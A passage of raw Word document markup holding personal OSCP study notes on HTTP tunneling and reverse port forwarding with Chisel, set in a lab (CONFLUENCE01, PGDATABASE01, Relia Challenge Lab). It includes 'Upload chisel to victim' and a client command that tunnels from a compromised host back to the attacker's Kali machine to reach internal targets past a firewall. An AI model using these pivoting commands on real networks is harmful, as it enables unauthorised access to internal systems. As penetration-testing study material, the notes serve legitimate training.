        <w:t xml:space="preserve">This means we are listening on 127.0.0.1:8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload chisel to victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.\chisel.exe client 192.168.119.5:8080 R:127.0.0.1:80:172.16.6.241:80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want the traffic to be forwarded to localhost on target machine, then replace 172.16.6.241 with 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this on the victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We tell it to connect back to our Kali on port 8080, where it's waiting for a Chisel connection (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.119.5:8080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">R</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" stands for reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the local IP and port (on our Kali) that we should use to access the HTTP tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.6.241:80 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is where the traffic is being led to. This is the target machine on the 172 network that we want to access. So, all the traffic is sent to our compromised user (running chisel client) and then forwarded to this target user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="952500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="507" name="image495.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image495.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId205"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You should see these last two lines as a sign of connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="635000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="196" name="image206.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image206.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId206"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what it should look like on the client</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Once Chisel connects, we can browse to port 80 on 172.16.6.241 via port 80 on our Kali machine (127.0.0.1) by using Firefox.</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If any pages don't load, add any host names you see in the URL to /etc/hosts to resolve host names</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then try both the IP and the hostname, since in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the IP didn't work but when I tried the hostname directly instead of the IP, it worked. This was not for tunneling btw. It was just getting a website to load</w:t>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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_eatwn0iq8hwj" w:id="87"/>
      <w:bookmarkEnd w:id="87"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Tunneling using Chisel (Reverse Dynamic Port Forwarding)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009D6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I would recommend you look at this simple guide below, which teaches how to do all the different styles of port forwarding using Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId207">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the examples, the "targets" are actually ports on the "middle man." This is technically a valid target, since the ports are only open to localhost on middle man, so you need to pivot to middle man in order to access these target ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But when you use these commands, you can change the target ports to another machine separate to middleman that is accessible from middleman and not your Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009DA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 20.1. HTTP Tunneling Theory and Practice</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: This OSCP guide only teaches us how to do Reverse Port Forwarding with Chisel. In the next section, I will teach how to do Regular port forwarding using Chisel</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t xml:space="preserve">IMPORTANT: This section also teaches us how to run SSH through a SOCKS proxy. And spoiler, you can't just run it through </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>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t xml:space="preserve">HTTP Tunneling is great when SSH is not available, or if it's blocked by a firewall. On the other hand, it's pretty common to see HTTP servers open and allowed to pass through firewalls. </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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2387600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="309" name="image296.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image296.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId208"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="238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E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="489"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The goal is to get from Kali machine to PGDATABASE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="489"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nothing can get in and out of the firewall between Kali and MULTISERVER03, so we have to go through CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="489"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFLUENCE01 firewall only allows TCP/8090 inbound (which is the webserver), and only allows HTTP outbound.</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The above is a perfect scenario for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chisel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, an HTTP tunneling tool that encapsulates our data stream within HTTP. It also uses the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">protocol within the tunnel so our data will be encrypted.</w:t>
      </w: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Chisel uses a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">client/server model</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. A Chisel </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">must be set up, which can </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">accept </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a connection from the Chisel </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">client</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Various port forwarding options are available depending on the server and client configurations. One option that is particularly useful for us is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH remote port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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t xml:space="preserve">NOTE: Chisel can run on macOS, Linux, and Windows, and on various architectures on each. Older tools like HTTPTunnel offer similar tunneling functionality but lack the flexibility and cross-platform capabilities of Chisel.</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ind w:left="-630" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6840967" cy="2795588"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="565" name="image552.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image552.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId209"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6840967" cy="2795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F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1335"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">THIS IS AN EXAMPLE OF </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CHISEL reverse port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1335"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will run a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chisel server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">machine, which will accept a connection from a Chisel </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">client </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">running on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFLUENCE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1335"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chisel will bind a SOCKS proxy port on the Kali machine (Chisel Server)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1335"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Chisel server (Kali) will encapsulate whatever we send through the SOCKS port and push it through the HTTP tunnel, SSH-encrypted. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1335"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
